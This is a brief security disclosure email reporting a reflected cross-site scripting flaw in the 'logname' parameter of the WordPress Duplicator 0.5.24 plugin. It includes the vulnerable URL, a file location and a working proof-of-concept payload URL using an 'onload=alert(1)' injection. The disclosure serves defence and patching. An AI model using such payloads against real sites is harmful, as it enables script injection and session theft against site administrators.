Subject: Cross-Site Scripting (XSS) in Duplicator 0.5.24
Date: Sat, 15 Aug 2015 14:03:10 +0200

Hello,

Plugin: Duplicator 0.5.24 https://wordpress.org/plugins/duplicator/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=[xss]
Vulnerable parameters: logname

Example PHP callstack:
/duplicator/views/tools/logging.php:158

Verification:
http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=%22+onload%3Dalert%281%29+%3E

-- 
Regards,
Marcin Probola,